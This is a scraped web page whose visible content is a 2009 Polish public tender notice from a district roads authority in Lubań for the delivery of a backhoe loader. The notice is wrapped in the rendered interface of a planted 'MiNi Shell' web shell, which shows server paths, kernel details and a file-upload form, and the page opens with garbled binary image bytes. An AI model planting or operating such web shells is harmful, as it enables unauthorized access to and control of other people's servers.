JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090403/90832-N-2009.html

<p class="kh_header"><b>Lubań: Dostawa koparko-ładowarki</b><br>
<b>Numer ogłoszenia: 90832 - 2009; data zamieszczenia: 03.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg , ul. J. Dąbrowskiego 29c, 59-800 Lubań, woj. dolnośląskie, tel. 075 6463750, faks 075 6462192.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa koparko-ładowarki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Parametry techniczne:
1. Koparko - ładowarka kołowa spełniająca wymagania pojazdu dopuszczonego do poruszania się po drogach publicznych zgodnie z obowiązującymi przepisami ustawy (Prawo o ruchu drogowym) posiadająca homologację drogową.
2. Świadectwo zgodności (CE)
3. Masa własna max 8500kg
4. Silnik wysokoprężny czterocylindrowy z turbodoładowaniem spełniający wymogi dyrektywy unijnej 97/68/EC Stage 2 dotyczącej emisji spalin i poziomu hałasu, moc silnika min. 80KW, max. moment obrotowy, min. 500 Nm
5. Napęd na obie osie 4x4 z możliwością wyboru napędu na jedną lub dwie osie
6. Koła jezdne: przednie małe, tylne duże
7. Przednia oś wychylna, przednie koła skrętne
8. Układ kierowniczy wspomagany hydraulicznie
9. Układ hamulcowy tarczowy działający na jedną lub dwie osie z możliwością hamowania lewym lub prawym kołem
10. Elektryczny przełącznik zmiany kierunku jazdy 
11. Podwójna pompa zębata hydrauliczna o ciśnieniu max 210 bar i przepływie min. 160l/min pozwalająca na jednoczesne łączenie wszystkich ruchów części koparkowej (system load sensing)
12. Skrzynia biegów: min. 4 biegi do przodu i 4 biegi do tyłu pozwalająca na płynną zmianę biegów pod obciążeniem pozwalająca na uzyskanie szybkich cykli pracy maszyny
13. Stabilizatory tylne niezależne wysuwane hydraulicznie z regulacją luzów ( szybko-wymienne ślizgi)
14. Ogrzewana kabina operatora spełniająca normy ROPS/FOPS, fotel z dwoma podłokietnikami

Osprzęt ładowarkowy koparko-ładowarki
1. łyżka ładowarki z dwoma siłownikami, zapewniająca samo poziomowanie łyżki ładowarkowej, 
2. Powrót łyżki do poziomu gruntu
3. łyżka ładowarkowa dzielona (otwierana), wielofunkcyjna - możliwość spychania, rozścielania, wyrównywania, ładowania, chwytania, kopania, widły (6x1)
4. pojemność łyżki ładowarki 1m3 
5. wysokość załadunku mierzona do osi sworznia obrotu łyżki ładowarki: min. 3500 mm wysokość wysypu przy 45° otwarcia łyżki
6. Łyżka ładowarkowa sterowana joystickiem wielofunkcyjnym

Osprzęt koparkowy koparko-ładowarki
1. część koparkowa przesuwana poprzecznie,
2. ramię koparkowe o zmiennej długości z wysuwem teleskopowym, głębokość kopania min. 5,7m.
4. szybkozłącze mechaniczne do szybkiej wymiany łyżek koparkowych
3. łyżki koparkowe ze sworzniami o szerokości 600-700 mm  oraz skarpówka 1500 mm
4. wysokość załadunku mierzona przy złożonym ramieniu koparki min. 3900mm 
6. możliwość blokowania wysięgnika koparkowego w 3 pozycjach

Wyposażenie obowiązkowe koparko-ładowarki
1. instrukcja obsługi
2. gaśnica
3. pulsacyjna lampa ostrzegawcza na dachu kabiny świecąca w kolorze pomarańczowym
4. sygnał cofania
5. immobiliser
6. skrzynka narzędziowa
7. smarownica
8. klucz do kół
9. ciśnieniomierz
10. Światła robocze z przodu i z tyłu maszyny
11. Wycieraczka na przedniej i tylnej szybie
12. Blokada tylnego ramienia koparkowego podczas transportu
13. Błotniki przednich kół
14. Drzwi po obu stronach kabiny

Zamawiający wymaga zapewnienia gwarancji min. 12 m-cy 

Wymagania techniczne i jakościowe:
1. Wszystkie pozycje stanowiące przedmiot zamówienia muszą być fabrycznie nowe i pochodzić z bieżącej produkcji (rok produkcji 2008 lub 2009).
2. Przekazanie pojazdu przez Wykonawcę nastąpi na podstawie protokółu zdawczo - odbiorczego z opisem stanu technicznego oraz na podstawie żądanych dokumentów: 
instrukcji  obsługi pojazdu w języku polskim,
potwierdzającego gwarancję - min. 12 m-cy,
potwierdzających dopuszczenie pojazdu do ruchu drogowego w języku polskim, zgodnie z obowiązującym prawem,
książki serwisowej w języku polskim,
umożliwiających rejestrację pojazdu we właściwym urzędzie,
3. Dostawca zobowiązany jest do podania nazwy, marki, typu, parametrów i producenta oferowanego sprzętu.
4. Sprzedający powinien być producentem lub autoryzowanym przedstawicielem producenta nie krócej niż dwa lata.
5. Autoryzowany punkt obsługi serwisowej w okresie gwarancji powinien być w odległości nie większej jak 70 km i powinien funkcjonować, co najmniej 3 lata.
6. Koszty związane z transportem do siedziby Zamawiającego ponosi Wykonawca.
7. Pojazd musi spełniać normy i certyfikaty przewidziane polskim prawem.

 Wymagane warunki gwarancji i serwisu:
1. Zapewnienie w ramach ceny ofertowej szkolenia u przyszłych użytkowników w zakresie eksploatacji i obsługi dostarczonego sprzętu
2. Serwisowanie przedmiotu sprzedaży w okresie udzielonej gwarancji, oraz po okresie gwarancji.
3. Czas reakcji serwisu wynosił będzie maksymalnie 48 godziny pod rygorem najmu środka zastępczego na koszt gwaranta Przez reakcje serwisu rozumie się czas od zgłoszenia do momentu przystąpienia gwaranta do usuwania awarii.
4. Zgłoszenia awarii będą składane telefonicznie w dni robocze w godzinach 7:00 do 15:00. Zgłoszenia faksem odbywać się będą całą dobę.
5. Maksymalny czas usunięcia usterki/dokonania naprawy: 10 dni od momentu zgłoszenia,
6. Jeżeli termin usunięcia wad, usterek przekraczać będzie okres 10 dni Dostawca pojazdów wraz z osprzętem obowiązany jest dostarczyć Zamawiającemu na ten czas sprzęt zastępczy,
7.Miejsce wykonania napraw gwarancyjnych: wszelkie naprawy będą odbywały się u Zamawiającego, a w szczególnych przypadkach u Serwisanta,
8. Serwis świadczony będzie przez firmę posiadająca autoryzacje producenta oraz przez osoby posiadające odpowiednie kwalifikacje.
9. Usterka lub awaria, która nastąpi w okresie gwarancji będzie usunięta przez serwis bezpłatnie, łącznie z ewentualnym transportem przedmiotu zakupu do serwisu, kosztami części i robocizny.
10. W przypadku trzech napraw w okresie gwarancji Dostawca wymieni (dostarczy) nowy sprzęt o parametrach zaoferowanych bądź lepszych, na stałe.
11. Gwarancja rozpoczyna swój bieg od daty protokolarnego odbioru przedmiotu zakupu.
12. Okres gwarancji ulega przedłużeniu o czas napraw.
13. Okres gwarancji biegnie na nowo dla elementów wymienionych,
14. Dostawca sprzętu zobowiązany będzie do zabezpieczenia ww. warunków również wówczas, gdy producent wystawi dokument gwarancyjny.
Termin dostawy: 7 dni od zawarcia umowy. Miejsce dostawy: siedziba Powiatowego Zarządu Dróg w Lubaniu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 43.26.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Niniejsza specyfikacja oraz wszystkie dokumenty do niej dołączone mogą być użyte jedynie w celu sporządzenia oferty.
Oferent przedstawia ofertę zgodnie z wymaganiami określonymi w niniejszej specyfikacji. 
Oferent ponosi wszystkie koszty związane z przygotowaniem i złożeniem oferty
Zamawiający odrzuci ofertę, jeżeli:
a)	jest sprzeczna z ustawą, 
b)	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, 
c)	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, 
d)	zawiera rażąco niską ceną w stosunku do przedmiotu zamówienia,
e)	została złożona przez dostawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
f)	zawiera omyłki rachunkowe w obliczeniu ceny, których nie można poprawiać na podstawie art. 88 ustawy, lub błędy w obliczeniu ceny,
g)	dostawca w terminie 7 dni od dnia otrzymania zawiadomienia nie zgodzi się na poprawienie omyki rachunkowej w obliczeniu ceny,
h)	jest nieważna na podstawie odrębnych przepisów.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A) Oferta musi zawierać:
Formularz oferty
Oświadczenie dostawcy o spełnieniu warunków w związku z art.22 i 24 Ustawy Prawo zamówień publicznych
Zamawiający żąda dokumentów w formie oryginału lub kserokopii poświadczonej na każdej zapisanej stronie za zgodność z oryginałem:
koncesji, zezwolenia lub licencji, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem,
aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, w zakresie objętym niniejszym zamówieniem, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
B) Wymienione w niniejszej SIWZ dokumenty powinny być oryginałami albo kopiami potwierdzonymi za zgodność z oryginałem przez upoważnionych przedstawicieli dostawcy
C) Brak jakiegokolwiek z wyżej wymienionych dokumentów lub złożenie dokumentu w niewłaściwej formie (kopia dokumentu niepoświadczona za zgodność z oryginałem) spowoduje wykluczenie dostawcy z postępowania lub odrzucenie oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatluban.pl;www.pzdluban.bip.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg
59-800 Lubań
ul.Dąbrowskiego 29c.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2009 godzina 12:00, miejsce: Powiatowy Zarząd Dróg
59-800 Lubań
ul.Dąbrowskiego 29c.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com